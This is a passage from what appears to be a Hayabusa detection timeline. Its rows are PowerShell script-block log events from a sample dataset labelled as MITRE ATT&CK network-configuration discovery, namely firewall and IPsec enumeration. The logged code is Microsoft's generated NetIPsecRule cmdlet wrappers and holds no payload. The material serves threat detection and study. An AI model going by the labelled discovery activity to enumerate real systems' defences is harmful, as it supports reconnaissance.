($PSBoundParameters.ContainsKey('AssociatedNetIPsecQuickModeCryptoSet') -and (@('ByAssociatedNetIPsecQuickModeCryptoSet') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecQuickModeCryptoSet}, 'MSFT_NetConSecRuleQMCryptoSet', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByIPsecRuleName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase2AuthSet', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecQuickModeCryptoSet', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByIPsecRuleName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase2AuthSet', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecQuickModeCryptoSet', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } if ($PSBoundParameters.ContainsKey('TracePolicyStore') -and (@('ByIPsecRuleName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase2AuthSet', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecQuickModeCryptoSet', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('TracePolicyStore', ${TracePolicyStore}) } $__cmdletization_methodParameters = Microsoft.PowerShell.Utility\New-Object System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter] switch -exact ($PSCmdlet.ParameterSetName) { { @('ByIPsecRuleName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase2AuthSet', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecQuickModeCryptoSet', 'GetAll', 'InputObject (cdxml)') -contains $_ } { [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Servers')) { [object]$__cmdletization_value = ${Servers} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Servers'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Servers'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Domains')) { [object]$__cmdletization_value = ${Domains} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Domains'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Domains'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('EndpointType')) { [object]$__cmdletization_value = ${EndpointType} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'EndpointType'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.EndpointType'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'EndpointType'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.EndpointType'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('AddressType')) { [object]$__cmdletization_value = ${AddressType} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'AddressType'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.AddressVersion'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'AddressType'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.AddressVersion'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Output'; ParameterType = 'Microsoft.Management.Infrastructure.CimInstance[]'; Bindings = 'Out'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('DnsServers')) { [object]$__cmdletization_value = ${DnsServers} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'DnsServers'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'DnsServers'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) $__cmdletization_returnValue = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{ Name = 'ReturnValue'; ParameterType = 'System.Int32'; Bindings = 'Error'; Value = $null; IsValuePresent = $false } $__cmdletization_methodInvocationInfo = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodInvocationInfo @('SyncPolicyDelta', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = $false if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecRule.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Sync-NetIPsecRule' function Update-NetIPsecRule { [CmdletBinding(DefaultParameterSetName='Query (cdxml)', SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance[]])] param( [Parameter(ParameterSetName='Query (cdxml)', Mandatory=$true, ValueFromPipelineByPropertyName=$true)] [Alias('ID','Name')] [ValidateNotNull()] [string[]] ${IPsecRuleName}, [Parameter(ParameterSetName='Query (cdxml)')] [string] ${PolicyStore}, [Parameter(ParameterSetName='Query (cdxml)')] [string] ${GPOSession}, [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetConSecRule')] [ValidateNotNull()] [ciminstance[]] ${InputObject}, [Parameter(ParameterSetName='Query (cdxml)', Mandatory=$true, ValueFromPipelineByPropertyName=$true)] [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipelineByPropertyName=$true)] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.ChangeAction] ${Action}, [Parameter(ParameterSetName='Query (cdxml)', ValueFromPipelineByPropertyName=$true)] [Parameter(ParameterSetName='InputObject (cdxml)', ValueFromPipelineByPropertyName=$true)] [string[]] ${IPv6Addresses}, [Parameter(ParameterSetName='Query (cdxml)', ValueFromPipelineByPropertyName=$true)] [Parameter(ParameterSetName='InputObject (cdxml)', ValueFromPipelineByPropertyName=$true)] [string[]] ${IPv4Addresses}, [Parameter(ParameterSetName='Query (cdxml)', Mandatory=$true, ValueFromPipelineByPropertyName=$true)] [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipelineByPropertyName=$true)] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.EndpointType] ${EndpointType}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${PassThru}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] [Microsoft.Management.Infrastructure.CimSession[]] ${CimSession}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${AsJob}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = Microsoft.PowerShell.Utility\New-Object $script:ObjectModelWrapper $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if",rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx +2021-10-25 07:23:05.754 +00:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"(-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('IPsecRuleName') -and (@('Query (cdxml)') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${IPsecRuleName}) $__cmdletization_queryBuilder.FilterByProperty('InstanceID', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('Query (cdxml)') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('Query (cdxml)') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } $__cmdletization_methodParameters = Microsoft.PowerShell.Utility\New-Object System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter] switch -exact ($PSCmdlet.ParameterSetName) { { @('Query (cdxml)', 'InputObject (cdxml)') -contains $_ } { [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Action')) { [object]$__cmdletization_value = ${Action} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Action'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.ChangeAction'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Action'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.ChangeAction'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('IPv6Addresses')) { [object]$__cmdletization_value = ${IPv6Addresses} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'IPv6Addresses'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'IPv6Addresses'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('IPv4Addresses')) { [object]$__cmdletization_value = ${IPv4Addresses} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'IPv4Addresses'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'IPv4Addresses'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('EndpointType')) { [object]$__cmdletization_value = ${EndpointType} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'EndpointType'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.EndpointType'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'EndpointType'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.EndpointType'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('PassThru')) { [object]$__cmdletization_value = ${PassThru} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'PassThru'; ParameterType = 'System.Management.Automation.SwitchParameter'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'PassThru'; ParameterType = 'System.Management.Automation.SwitchParameter'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Output'; ParameterType = 'Microsoft.Management.Infrastructure.CimInstance[]'; Bindings = 'Out'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) $__cmdletization_returnValue = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{ Name = 'ReturnValue'; ParameterType = 'System.Int32'; Bindings = 'Error'; Value = $null; IsValuePresent = $false } $__cmdletization_methodInvocationInfo = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodInvocationInfo @('SetPolicyDelta', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = $false if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecRule.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Update-NetIPsecRule'",rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx +2021-10-25 07:23:05.770 +00:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"function __cmdletization_BindCommonParameters { param( $__cmdletization_objectModelWrapper, $myPSBoundParameters ) if ($myPSBoundParameters.ContainsKey('CimSession')) { $__cmdletization_objectModelWrapper.PSObject.Properties['CimSession'].Value = $myPSBoundParameters['CimSession'] } if ($myPSBoundParameters.ContainsKey('ThrottleLimit')) { $__cmdletization_objectModelWrapper.PSObject.Properties['ThrottleLimit'].Value = $myPSBoundParameters['ThrottleLimit'] } if ($myPSBoundParameters.ContainsKey('AsJob')) { $__cmdletization_objectModelWrapper.PSObject.Properties['AsJob'].Value = $myPSBoundParameters['AsJob'] } }",rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx +2021-10-25 07:23:05.770 +00:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"function New-NetIPsecRule { [CmdletBinding(SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] param( [Parameter(ParameterSetName='cim:CreateInstance0')] [string] ${PolicyStore}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string] ${GPOSession}, [Parameter(ParameterSetName='cim:CreateInstance0', ValueFromPipelineByPropertyName=$true)] [Alias('ID','Name')] [string] ${IPsecRuleName}, [Parameter(ParameterSetName='cim:CreateInstance0', Mandatory=$true)] [string] ${DisplayName}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string] ${Description}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string] ${Group}, [Parameter(ParameterSetName='cim:CreateInstance0')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Enabled] ${Enabled}, [Parameter(ParameterSetName='cim:CreateInstance0')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Profile] ${Profile}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string[]] ${Platform}, [Parameter(ParameterSetName='cim:CreateInstance0')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.IPsecMode] ${Mode}, [Parameter(ParameterSetName='cim:CreateInstance0')] [Alias('SecIn')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.SecurityPolicy] ${InboundSecurity}, [Parameter(ParameterSetName='cim:CreateInstance0')] [Alias('SecOut')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.SecurityPolicy] ${OutboundSecurity}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string] ${QuickModeCryptoSet}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string] ${Phase1AuthSet}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string] ${Phase2AuthSet}, [Parameter(ParameterSetName='cim:CreateInstance0')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.KeyModule] ${KeyModule}, [Parameter(ParameterSetName='cim:CreateInstance0')] [bool] ${AllowWatchKey}, [Parameter(ParameterSetName='cim:CreateInstance0')] [bool] ${AllowSetKey}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string[]] ${LocalTunnelEndpoint}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string[]] ${RemoteTunnelEndpoint}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string] ${RemoteTunnelHostname}, [Parameter(ParameterSetName='cim:CreateInstance0')] [uint32] ${ForwardPathLifetime}, [Parameter(ParameterSetName='cim:CreateInstance0')] [bool] ${EncryptedTunnelBypass}, [Parameter(ParameterSetName='cim:CreateInstance0')] [bool] ${RequireAuthorization}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string] ${User}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string] ${Machine}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string[]] ${LocalAddress}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string[]] ${RemoteAddress}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string] ${Protocol}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string[]] ${LocalPort}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string[]] ${RemotePort}, [Parameter(ParameterSetName='cim:CreateInstance0')] [System.Management.Automation.WildcardPattern[]] ${InterfaceAlias}, [Parameter(ParameterSetName='cim:CreateInstance0')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.InterfaceType] ${InterfaceType}, [Parameter(ParameterSetName='cim:CreateInstance0')] [Alias('Session')] [ValidateNotNullOrEmpty()] [Microsoft.Management.Infrastructure.CimSession[]] ${CimSession}, [Parameter(ParameterSetName='cim:CreateInstance0')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='cim:CreateInstance0')] [switch] ${AsJob}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = Microsoft.PowerShell.Utility\New-Object $script:ObjectModelWrapper $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_methodParameters = Microsoft.PowerShell.Utility\New-Object 'System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter]' [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('PolicyStore')) { [object]$__cmdletization_value = ${PolicyStore} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:PolicyStore'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:PolicyStore'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('GPOSession')) { [object]$__cmdletization_value = ${GPOSession} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:GPOSession'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:GPOSession'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('IPsecRuleName')) { [object]$__cmdletization_value = ${IPsecRuleName} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'InstanceID'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'InstanceID'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('DisplayName')) { [object]$__cmdletization_value = ${DisplayName} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'ElementName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'ElementName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Description')) { [object]$__cmdletization_value = ${Description} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Description'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Description'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Group')) { [object]$__cmdletization_value = ${Group} $__cmdletization_methodParameter = 